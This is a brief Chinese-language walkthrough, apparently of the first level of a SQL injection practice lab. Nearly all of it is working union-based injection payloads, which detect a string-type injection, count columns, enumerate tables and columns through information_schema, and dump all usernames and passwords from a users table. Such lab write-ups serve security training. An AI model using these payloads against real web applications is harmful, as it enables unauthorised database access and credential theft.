第一关
-
首先,
id=1 and 1=1和id=1 and 1=2测试是否为数字型注入。经尝试,未出现报错,所以不是数字型注入
之后尝试id=1‘ and 1=1 --+和id=1‘ and 1=2 --+出现错误,判断为字符型注入 -
使用order by查询列数
id=1‘ order by 4 --+
试到 4 报错 说明列数是3列
3.union联合查询,测试回显位 id=-1‘ union select 1,2,3 --+
4.爆库 id=-1‘ union select 1,database(),3 --+
-
爆表
id=-1‘ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+ -
查询user列名
id=-1‘ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3 --+ -
第六步可以看到username和password,查询一下这两列的数据
id=-1‘ union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+